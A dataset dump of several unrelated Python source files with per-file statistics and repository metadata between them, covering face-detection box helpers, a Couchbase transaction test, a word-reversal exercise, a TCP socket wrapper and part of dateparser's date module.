return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
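# Illustrative only (not part of the original module): a worked example of the
# regression step above, using hypothetical numbers. For a box [10, 10, 29, 29]
# (w = h = 29 - 10 + 1 = 20) and offsets reg = [0.1, 0.0, -0.1, 0.0], bbreg moves
# x_min to 10 + 0.1 * 20 = 12 and x_max to 29 - 0.1 * 20 = 27, leaving the
# y coordinates unchanged.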
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
    # Python indexes from 0, while MATLAB indexes from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
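# Illustrative only (not part of the original module): rerec makes each box square
# around its centre. A hypothetical box [0, 0, 10, 20] has w = 10, h = 20, so
# max_side = 20 and the result is [-5, 0, 15, 20]: the longer side is kept and the
# shorter side is expanded symmetrically.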
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
| 39.494444
| 120
| 0.623435
| 1,145
| 7,109
| 3.684716
| 0.175546
| 0.064707
| 0.11946
| 0.112586
| 0.310974
| 0.252192
| 0.226594
| 0.212373
| 0.1799
| 0.1799
| 0
| 0.032146
| 0.229849
| 7,109
| 179
| 121
| 39.715084
| 0.738447
| 0.089886
| 0
| 0.111111
| 0
| 0
| 0.01687
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.027778
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134646519d68e17184a83f90eaeb23182da3950c
| 8,849
|
py
|
Python
|
pytests/Atomicity/basic_ops.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/Atomicity/basic_ops.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/Atomicity/basic_ops.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
from Cb_constants import DocLoading
from basetestcase import ClusterSetup
from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator
from couchbase_helper.tuq_generators import JsonGenerator
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from com.couchbase.client.java.json import JsonObject
"""
Basic test cases with commit and rollback scenarios
"""
class basic_ops(ClusterSetup):
def setUp(self):
super(basic_ops, self).setUp()
if self.num_buckets:
self.bucket_util.create_multiple_buckets(
self.cluster.master,
self.num_replicas,
bucket_count=self.num_buckets,
bucket_type=self.bucket_type,
ram_quota=self.bucket_size,
storage=self.bucket_storage,
eviction_policy=self.bucket_eviction_policy)
else:
self.create_bucket()
self.sleep(10, "Wait for bucket to become ready for ops")
# Reset active_resident_threshold to avoid further data load as DGM
self.active_resident_threshold = 0
self.log.info("==========Finished Basic_ops base setup========")
def tearDown(self):
super(basic_ops, self).tearDown()
def get_doc_generator(self, start, end):
age = range(5)
first = ['james', 'sharon']
body = [''.rjust(self.doc_size - 10, 'a')]
template = JsonObject.create()
template.put("age", None)
template.put("first_name", None)
template.put("body", None)
generator = DocumentGenerator(self.key, template, randomize=True,
age=age,
first_name=first, body=body,
start=start, end=end,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type)
return generator
@staticmethod
def generate_docs_bigdata(docs_per_day, start=0, document_size=1024000):
json_generator = JsonGenerator()
return json_generator.generate_docs_bigdata(end=docs_per_day,
start=start,
value_size=document_size)
def test_basic_commit(self):
"""
Test transaction commit, rollback, time ahead,
time behind scenarios with replica, persist_to and
replicate_to settings
"""
# Atomicity.basic_ops.basic_ops.test_basic_commit
self.drift_ahead = self.input.param("drift_ahead", False)
self.drift_behind = self.input.param("drift_behind", False)
gen_create = self.get_doc_generator(0, self.num_items)
self.op_type = self.input.param("op_type", 'create')
if self.drift_ahead:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
            self.log.info('Date after setting the clock forward: {0}'.format(output))
        if self.drift_behind:
            shell = RemoteMachineShellConnection(self.servers[0])
            self.assertTrue(shell.change_system_time(-3600),
                            'Failed to set back the clock')
            output, _ = shell.execute_command('date')
            self.log.info('Date after setting the clock back: {0}'.format(output))
self.log.info("Loading docs using AtomicityTask")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, self.op_type, exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
if self.op_type == "time_out":
self.sleep(90, "Wait for staged docs to get cleared")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=200,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.task_manager.get_task_result(task)
def test_large_doc_size_commit(self):
gen_create = self.generate_docs_bigdata(docs_per_day=self.num_items,
document_size=self.doc_size)
self.log.info("going to create a task")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
def test_MB_41944(self):
num_index = self.input.param("num_index", 1)
# Create doc_gen for loading
doc_gen = doc_generator(self.key, 0, 1)
# Get key for delete op and reset the gen
key, v = doc_gen.next()
doc_gen.reset()
# Open SDK client connection
client = SDKClient([self.cluster.master], self.bucket_util.buckets[0])
query = list()
query.append("CREATE PRIMARY INDEX index_0 on %s USING GSI"
% self.bucket_util.buckets[0].name)
if num_index == 2:
query.append("CREATE INDEX index_1 on %s(name,age) "
"WHERE mutated=0 USING GSI"
% self.bucket_util.buckets[0].name)
# Create primary index on the bucket
for q in query:
client.cluster.query(q)
        # Wait for index to become online
        for idx, _ in enumerate(query):
            state_query = "SELECT state FROM system:indexes WHERE name='index_%s'" \
                          % idx
            state = None
            retries = 0
            while retries < 30:
                state = client.cluster.query(state_query) \
                    .rowsAsObject()[0].get("state")
                if state == "online":
                    break
                retries += 1
                self.sleep(1)
            if state != "online":
                self.log_failure("Index 'index_%s' not yet online" % idx)
# Start transaction to create the doc
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Perform sub_doc operation on same key
_, fail = client.crud(DocLoading.Bucket.SubDocOps.INSERT,
key=key, value=["_sysxattr", "sysxattr-payload"],
xattr=True)
if fail:
self.log_failure("Subdoc insert failed: %s" % fail)
else:
self.log.info("Subdoc insert success")
# Delete the created doc
result = client.crud(DocLoading.Bucket.DocOps.DELETE, key)
if result["status"] is False:
self.log_failure("Doc delete failed: %s" % result["error"])
else:
self.log.info("Document deleted")
# Re-insert same doc through transaction
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Close SDK Client connection
client.close()
self.validate_test_failure()
| 42.138095
| 79
| 0.600181
| 1,019
| 8,849
| 4.996075
| 0.223749
| 0.025535
| 0.02475
| 0.032999
| 0.413082
| 0.396975
| 0.385582
| 0.385582
| 0.363976
| 0.363976
| 0
| 0.010176
| 0.311448
| 8,849
| 209
| 80
| 42.339713
| 0.825373
| 0.063284
| 0
| 0.322981
| 0
| 0
| 0.093364
| 0
| 0
| 0
| 0
| 0
| 0.012422
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.10559
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1346bfc37ba0726e8df79447049dc235a411088d
| 509
|
py
|
Python
|
reverseWord.py
|
lovefov/Python
|
ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8
|
[
"MIT"
] | null | null | null |
reverseWord.py
|
lovefov/Python
|
ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8
|
[
"MIT"
] | null | null | null |
reverseWord.py
|
lovefov/Python
|
ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8
|
[
"MIT"
] | 1
|
2021-02-08T08:48:44.000Z
|
2021-02-08T08:48:44.000Z
|
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
# Author: 贾江超
def spin_words(sentence):
list1=sentence.split()
l=len(list1)
for i in range(l):
relen = len(sentence.split()[i:][0])
        if relen >= 5:
list1[i]=list1[i][::-1]
return ' '.join(list1)
'''
Note: in Python 2.x you can use len() to get the list length this way, but in 3.x it no longer works the same.
Optimized version:
def spin_words(sentence):
    # Your code goes here
    return " ".join([x[::-1] if len(x) >= 5 else x for x in sentence.split(" ")])
Reversing a string here is easy with a slice: str[::-1] does the job.
'''
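# Illustrative usage (the expected behaviour of the kata, not part of the file):
# spin_words("Hey fellow warriors")  # -> "Hey wollef sroirraw"
# spin_words("This is a test")       # -> "This is a test"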
| 19.576923
| 81
| 0.569745
| 75
| 509
| 3.84
| 0.586667
| 0.135417
| 0.083333
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03876
| 0.239686
| 509
| 25
| 82
| 20.36
| 0.705426
| 0.100196
| 0
| 0
| 0
| 0
| 0.004386
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1346de71efda2a56a9fe39787dfce52620463eb1
| 3,461
|
py
|
Python
|
src/scs_host/comms/network_socket.py
|
south-coast-science/scs_host_cpc
|
08b4a28c022936462b60823cca136ba6746eac57
|
[
"MIT"
] | null | null | null |
src/scs_host/comms/network_socket.py
|
south-coast-science/scs_host_cpc
|
08b4a28c022936462b60823cca136ba6746eac57
|
[
"MIT"
] | null | null | null |
src/scs_host/comms/network_socket.py
|
south-coast-science/scs_host_cpc
|
08b4a28c022936462b60823cca136ba6746eac57
|
[
"MIT"
] | null | null | null |
"""
Created on 30 May 2017
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
A network socket abstraction, implementing ProcessComms
"""
import socket
import time
from scs_core.sys.process_comms import ProcessComms
# --------------------------------------------------------------------------------------------------------------------
class NetworkSocket(ProcessComms):
"""
    A blocking TCP socket for inter-process messaging, with an ACK handshake.
"""
__TIMEOUT = 4.0 # seconds
__BUFFER_SIZE = 1024 # bytes
__BACKLOG = 5
__ACK = "ACK"
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, host, port=2000): # a receiving socket should have host ''
"""
Constructor
"""
self.__address = (host, port)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.__conn = None
# ----------------------------------------------------------------------------------------------------------------
def connect(self, wait_for_availability=True):
while True:
try:
self.__socket.connect(self.__address)
break
except ConnectionRefusedError as ex:
if not wait_for_availability:
raise ConnectionRefusedError(ex)
time.sleep(0.1)
def close(self):
try:
if self.__conn:
self.__conn.close()
except RuntimeError:
pass
try:
self.__socket.close()
except RuntimeError:
pass
# ----------------------------------------------------------------------------------------------------------------
def read(self):
# socket...
self.__socket.bind(self.__address)
self.__socket.listen(NetworkSocket.__BACKLOG)
self.__conn, _ = self.__socket.accept()
# data...
while True:
message = self.__conn.recv(NetworkSocket.__BUFFER_SIZE).decode().strip()
if len(message) == 0:
break
yield message
def write(self, message, wait_for_availability=True):
while True:
try:
# data...
self.__socket.send(message.encode())
# wait for ACK...
timeout = time.time() + NetworkSocket.__TIMEOUT
while self.__socket.recv(NetworkSocket.__BUFFER_SIZE).decode() != NetworkSocket.__ACK:
time.sleep(0.001)
if time.time() > timeout:
break
break
except ConnectionError:
if not wait_for_availability:
raise
self.close()
time.sleep(0.1)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.connect()
# ----------------------------------------------------------------------------------------------------------------
def ack(self):
self.__conn.send(str(NetworkSocket.__ACK).encode())
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "NetworkSocket:{address:%s, socket:%s}" % (self.__address, self.__socket)
| 27.251969
| 118
| 0.428489
| 266
| 3,461
| 5.25188
| 0.368421
| 0.07874
| 0.054402
| 0.031496
| 0.230494
| 0.18325
| 0.141732
| 0.091625
| 0.091625
| 0.091625
| 0
| 0.010731
| 0.299913
| 3,461
| 126
| 119
| 27.468254
| 0.565827
| 0.271309
| 0
| 0.344262
| 0
| 0
| 0.016234
| 0.010552
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114754
| false
| 0.032787
| 0.04918
| 0.016393
| 0.262295
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13470b2018f5f54dbcfea9b085e57cd30b1be672
| 15,182
|
py
|
Python
|
dateparser/date.py
|
JKhakpour/dateparser
|
7f324cfd3de04e91752979cf65ae0dedc622375f
|
[
"BSD-3-Clause"
] | 2
|
2019-03-12T10:50:15.000Z
|
2021-07-07T14:38:58.000Z
|
dateparser/date.py
|
JKhakpour/dateparser
|
7f324cfd3de04e91752979cf65ae0dedc622375f
|
[
"BSD-3-Clause"
] | null | null | null |
dateparser/date.py
|
JKhakpour/dateparser
|
7f324cfd3de04e91752979cf65ae0dedc622375f
|
[
"BSD-3-Clause"
] | 1
|
2018-03-07T13:25:16.000Z
|
2018-03-07T13:25:16.000Z
|
# -*- coding: utf-8 -*-
import calendar
import collections
from datetime import datetime, timedelta
from warnings import warn
import six
import regex as re
from dateutil.relativedelta import relativedelta
from dateparser.date_parser import date_parser
from dateparser.freshness_date_parser import freshness_date_parser
from dateparser.languages.loader import LanguageDataLoader
from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages
from dateparser.conf import apply_settings
from dateparser.utils import normalize_unicode, apply_timezone_from_settings
APOSTROPHE_LOOK_ALIKE_CHARS = [
u'\N{RIGHT SINGLE QUOTATION MARK}', # u'\u2019'
u'\N{MODIFIER LETTER APOSTROPHE}', # u'\u02bc'
u'\N{MODIFIER LETTER TURNED COMMA}', # u'\u02bb'
u'\N{ARMENIAN APOSTROPHE}', # u'\u055a'
u'\N{LATIN SMALL LETTER SALTILLO}', # u'\ua78c'
u'\N{PRIME}', # u'\u2032'
u'\N{REVERSED PRIME}', # u'\u2035'
u'\N{MODIFIER LETTER PRIME}', # u'\u02b9'
u'\N{FULLWIDTH APOSTROPHE}', # u'\uff07'
]
RE_NBSP = re.compile(u'\xa0', flags=re.UNICODE)
RE_SPACES = re.compile(r'\s+')
RE_TRIM_SPACES = re.compile(r'^\s+(\S.*?)\s+$')
RE_SANITIZE_SKIP = re.compile(r'\t|\n|\r|\u00bb|,\s\u0432|\u200e|\xb7|\u200f|\u064e|\u064f', flags=re.M)
RE_SANITIZE_RUSSIAN = re.compile(r'([\W\d])\u0433\.', flags=re.I | re.U)
RE_SANITIZE_AMPM = re.compile(r'\b([ap])(\.)?m(\.)?\b', flags=re.DOTALL | re.I)
RE_SANITIZE_ON = re.compile(r'^.*?on:\s+(.*)')
RE_SANITIZE_APOSTROPHE = re.compile(u'|'.join(APOSTROPHE_LOOK_ALIKE_CHARS))
RE_SEARCH_TIMESTAMP = re.compile(r'^\d{10}(?![^\d.])')
def sanitize_spaces(html_string):
html_string = RE_NBSP.sub(' ', html_string)
html_string = RE_SPACES.sub(' ', html_string)
html_string = RE_TRIM_SPACES.sub(r'\1', html_string)
return html_string
def date_range(begin, end, **kwargs):
dateutil_error_prone_args = ['year', 'month', 'week', 'day', 'hour',
'minute', 'second']
for arg in dateutil_error_prone_args:
if arg in kwargs:
raise ValueError("Invalid argument: %s" % arg)
step = relativedelta(**kwargs) if kwargs else relativedelta(days=1)
date = begin
while date < end:
yield date
date += step
# handles edge-case when iterating months and last interval is < 30 days
if kwargs.get('months', 0) > 0 and (date.year, date.month) == (end.year, end.month):
yield end
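# A sketch of the behaviour above (illustrative, not part of the library code):
# list(date_range(datetime(2015, 6, 1), datetime(2015, 6, 4))) yields June 1, 2 and 3
# (the end date is exclusive). With months=1 the trailing `yield end` covers spans
# whose last partial month is shorter than a full step, e.g.
# list(date_range(datetime(2015, 1, 31), datetime(2015, 3, 20), months=1)) yields
# Jan 31, Feb 28 and finally the end date Mar 20 itself.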
def get_intersecting_periods(low, high, period='day'):
if period not in ['year', 'month', 'week', 'day', 'hour', 'minute', 'second', 'microsecond']:
raise ValueError("Invalid period: {}".format(period))
if high <= low:
return
step = relativedelta(**{period + 's': 1})
current_period_start = low
if isinstance(current_period_start, datetime):
reset_arguments = {}
for test_period in ['microsecond', 'second', 'minute', 'hour']:
if test_period == period:
break
else:
reset_arguments[test_period] = 0
current_period_start = current_period_start.replace(**reset_arguments)
if period == 'week':
current_period_start \
= current_period_start - timedelta(days=current_period_start.weekday())
elif period == 'month':
current_period_start = current_period_start.replace(day=1)
elif period == 'year':
current_period_start = current_period_start.replace(month=1, day=1)
while current_period_start < high:
yield current_period_start
current_period_start += step
def sanitize_date(date_string):
date_string = RE_SANITIZE_SKIP.sub(' ', date_string)
date_string = RE_SANITIZE_RUSSIAN.sub(r'\1 ', date_string) # remove u'г.' (Russian for year) but not in words
date_string = sanitize_spaces(date_string)
date_string = RE_SANITIZE_AMPM.sub(r'\1m', date_string)
date_string = RE_SANITIZE_ON.sub(r'\1', date_string)
date_string = RE_SANITIZE_APOSTROPHE.sub(u"'", date_string)
return date_string
def get_date_from_timestamp(date_string, settings):
if RE_SEARCH_TIMESTAMP.search(date_string):
date_obj = datetime.fromtimestamp(int(date_string[:10]))
date_obj = apply_timezone_from_settings(date_obj, settings)
return date_obj
def get_last_day_of_month(year, month):
return calendar.monthrange(year, month)[1]
def parse_with_formats(date_string, date_formats, settings):
""" Parse with formats and return a dictionary with 'period' and 'obj_date'.
:returns: :class:`datetime.datetime`, dict or None
"""
period = 'day'
for date_format in date_formats:
try:
date_obj = datetime.strptime(date_string, date_format)
except ValueError:
continue
else:
# If format does not include the day, use last day of the month
# instead of first, because the first is usually out of range.
if '%d' not in date_format:
period = 'month'
date_obj = date_obj.replace(
day=get_last_day_of_month(date_obj.year, date_obj.month))
if not ('%y' in date_format or '%Y' in date_format):
today = datetime.today()
date_obj = date_obj.replace(year=today.year)
date_obj = apply_timezone_from_settings(date_obj, settings)
return {'date_obj': date_obj, 'period': period}
else:
return {'date_obj': None, 'period': period}
class _DateLanguageParser(object):
DATE_FORMATS_ERROR_MESSAGE = "Date formats should be list, tuple or set of strings"
def __init__(self, language, date_string, date_formats, settings=None):
self._settings = settings
if isinstance(date_formats, six.string_types):
warn(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)
date_formats = [date_formats]
elif not (date_formats is None or isinstance(date_formats, (list, tuple, collections.Set))):
raise TypeError(self.DATE_FORMATS_ERROR_MESSAGE)
self.language = language
self.date_string = date_string
self.date_formats = date_formats
self._translated_date = None
self._translated_date_with_formatting = None
@classmethod
def parse(cls, language, date_string, date_formats=None, settings=None):
instance = cls(language, date_string, date_formats, settings)
return instance._parse()
def _parse(self):
for parser in (
self._try_timestamp,
self._try_freshness_parser,
self._try_given_formats,
self._try_parser,
self._try_hardcoded_formats,
):
date_obj = parser()
if self._is_valid_date_obj(date_obj):
return date_obj
else:
return None
def _try_timestamp(self):
return {
'date_obj': get_date_from_timestamp(self.date_string, self._settings),
'period': 'day',
}
def _try_freshness_parser(self):
return freshness_date_parser.get_date_data(self._get_translated_date(), self._settings)
def _try_parser(self):
_order = self._settings.DATE_ORDER
try:
if self._settings.PREFER_LANGUAGE_DATE_ORDER:
self._settings.DATE_ORDER = self.language.info.get('dateorder', _order)
date_obj, period = date_parser.parse(
self._get_translated_date(), settings=self._settings)
self._settings.DATE_ORDER = _order
return {
'date_obj': date_obj,
'period': period,
}
except ValueError:
self._settings.DATE_ORDER = _order
return None
def _try_given_formats(self):
if not self.date_formats:
return
return parse_with_formats(
self._get_translated_date_with_formatting(),
self.date_formats, settings=self._settings
)
def _try_hardcoded_formats(self):
hardcoded_date_formats = [
'%B %d, %Y, %I:%M:%S %p',
'%b %d, %Y at %I:%M %p',
'%d %B %Y %H:%M:%S',
'%A, %B %d, %Y',
'%Y-%m-%dT%H:%M:%S.%fZ'
]
try:
return parse_with_formats(
self._get_translated_date_with_formatting(),
hardcoded_date_formats,
settings=self._settings
)
except TypeError:
return None
def _get_translated_date(self):
if self._translated_date is None:
self._translated_date = self.language.translate(
self.date_string, keep_formatting=False, settings=self._settings)
return self._translated_date
def _get_translated_date_with_formatting(self):
if self._translated_date_with_formatting is None:
self._translated_date_with_formatting = self.language.translate(
self.date_string, keep_formatting=True, settings=self._settings)
return self._translated_date_with_formatting
def _is_valid_date_obj(self, date_obj):
if not isinstance(date_obj, dict):
return False
if len(date_obj) != 2:
return False
if 'date_obj' not in date_obj or 'period' not in date_obj:
return False
if not date_obj['date_obj']:
return False
if date_obj['period'] not in ('day', 'week', 'month', 'year'):
return False
return True
class DateDataParser(object):
"""
Class which handles language detection, translation and subsequent generic parsing of
string representing date and/or time.
:param languages:
A list of two letters language codes, e.g. ['en', 'es'].
If languages are given, it will not attempt to detect the language.
:type languages: list
:param allow_redetect_language:
Enables/disables language re-detection.
:type allow_redetect_language: bool
:param settings:
Configure customized behavior using settings defined in :mod:`dateparser.conf.Settings`.
:type settings: dict
:return: A parser instance
:raises:
ValueError - Unknown Language, TypeError - Languages argument must be a list
"""
language_loader = None
@apply_settings
def __init__(self, languages=None, allow_redetect_language=False, settings=None):
self._settings = settings
available_language_map = self._get_language_loader().get_language_map()
if isinstance(languages, (list, tuple, collections.Set)):
if all([language in available_language_map for language in languages]):
languages = [available_language_map[language] for language in languages]
else:
unsupported_languages = set(languages) - set(available_language_map.keys())
raise ValueError(
"Unknown language(s): %s" % ', '.join(map(repr, unsupported_languages)))
elif languages is not None:
raise TypeError("languages argument must be a list (%r given)" % type(languages))
if allow_redetect_language:
self.language_detector = AutoDetectLanguage(
languages if languages else list(available_language_map.values()),
allow_redetection=True)
elif languages:
self.language_detector = ExactLanguages(languages=languages)
else:
self.language_detector = AutoDetectLanguage(
list(available_language_map.values()), allow_redetection=False)
def get_date_data(self, date_string, date_formats=None):
"""
Parse string representing date and/or time in recognizable localized formats.
Supports parsing multiple languages and timezones.
:param date_string:
A string representing date and/or time in a recognizably valid format.
:type date_string: str|unicode
:param date_formats:
A list of format strings using directives as given
`here <https://docs.python.org/2/library/datetime.html#strftime-and-strptime-behavior>`_.
The parser applies formats one by one, taking into account the detected languages.
:type date_formats: list
:return: a dict mapping keys to :mod:`datetime.datetime` object and *period*. For example:
{'date_obj': datetime.datetime(2015, 6, 1, 0, 0), 'period': u'day'}
:raises: ValueError - Unknown Language
.. note:: *Period* values can be a 'day' (default), 'week', 'month', 'year'.
*Period* represents the granularity of date parsed from the given string.
In the example below, since no day information is present, the day is assumed to be current
day ``16`` from *current date* (which is June 16, 2015, at the moment of writing this).
Hence, the level of precision is ``month``:
>>> DateDataParser().get_date_data(u'March 2015')
{'date_obj': datetime.datetime(2015, 3, 16, 0, 0), 'period': u'month'}
Similarly, for date strings with no day and month information present, level of precision
is ``year`` and day ``16`` and month ``6`` are from *current_date*.
>>> DateDataParser().get_date_data(u'2014')
{'date_obj': datetime.datetime(2014, 6, 16, 0, 0), 'period': u'year'}
Dates with time zone indications or UTC offsets are returned in UTC time unless
specified using `Settings`_.
>>> DateDataParser().get_date_data(u'23 March 2000, 1:21 PM CET')
{'date_obj': datetime.datetime(2000, 3, 23, 14, 21), 'period': 'day'}
"""
if not(isinstance(date_string, six.text_type) or isinstance(date_string, six.string_types)):
raise TypeError('Input type must be str or unicode')
res = parse_with_formats(date_string, date_formats or [], self._settings)
if res['date_obj']:
return res
if self._settings.NORMALIZE:
date_string = normalize_unicode(date_string)
